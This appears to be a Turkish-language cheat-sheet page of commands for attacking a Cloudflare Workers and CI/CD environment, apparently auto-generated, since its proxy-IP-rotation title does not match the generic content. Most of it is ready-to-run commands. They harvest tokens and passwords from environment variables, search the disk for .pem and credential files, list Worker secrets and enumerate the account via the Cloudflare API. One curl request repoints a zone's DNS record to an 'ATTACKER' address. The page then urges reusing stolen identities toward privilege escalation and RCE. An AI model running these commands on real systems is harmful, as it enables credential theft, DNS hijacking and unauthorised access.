Skip to content

Cloudflare Workers Pass Through Proxy Ip Rotation

CI/CD enum

Cloudflare Workers Pass Through Proxy Ip Rotation — CI/CD ve DevOps ortamında kaynak envanteri ve izin yüzeyi keşfi notudur. Amaç: çağıran kimliği netleştirmek, servise özel saldırı yüzeyini komutlarla doğrulamak ve kanıtlanabilir etki üretmek. Her fence tek komut/payload taşır; çıktıyı hedefe göre uyarla.

  1. Çağıran kimliği ve etkili izinleri netleştir.

  2. Servise özel kaynak envanteri çıkar (liste + describe).

  3. Secret, trust policy ve yazma yüzeyi adaylarını işaretle.

  4. Bir sonraki privesc / veri / RCE hipotezini kilitle.

Önce kim olduğunu ve hangi hesaba/projeye/kontekste oturduğunu kilitle.

Terminal window
gh auth status 2>/dev/null
Terminal window
env | rg -i 'token|secret|key|password' | head
Terminal window
aws sts get-caller-identity 2>/dev/null
Terminal window
az account show 2>/dev/null
Terminal window
gcloud auth list 2>/dev/null

Cloudflare Workers Pass Through Proxy Ip Rotation için doğrudan uygulanabilir komutlar. Placeholder’ları (BUCKET, ROLE, FN, …) hedef değerlerle değiştir.

Terminal window
wrangler secret list
Terminal window
wrangler deploy
Terminal window
curl -sH "Authorization: Bearer $CFTOK" -X PUT https://api.cloudflare.com/client/v4/zones/Z/dns_records/R -d '{"type":"A","name":"x","content":"ATTACKER"}'
Terminal window
curl -sH "Authorization: Bearer $CFTOK" https://api.cloudflare.com/client/v4/user
Terminal window
curl -sH "Authorization: Bearer $CFTOK" https://api.cloudflare.com/client/v4/zones
Terminal window
curl -sH "Authorization: Bearer $CFTOK" https://api.cloudflare.com/client/v4/accounts/ACC/workers/scripts

Env, metadata, secret store ve CI loglarından ikinci kimlik topla; yeni principal ile döngüyü tekrarla.

Terminal window
env | rg -i 'key|secret|token|password|aws_|azure|gcp|kube'
Terminal window
printenv | sort
Terminal window
find / -name '*.pem' -o -name 'credentials' -o -name '*.json' 2>/dev/null | head -n 40

Rapor için yeniden üretilebilir çıktı bırak: komut, zaman, hesap/arn, etki özeti.

request/response veya CLI çıktısı
hesap / proje / cluster
etki: okuma | yazma | RCE | lateral
zaman damgası + dosya hash
Terminal window
mkdir -p evidence/cloud && tee evidence/cloud/notes.txt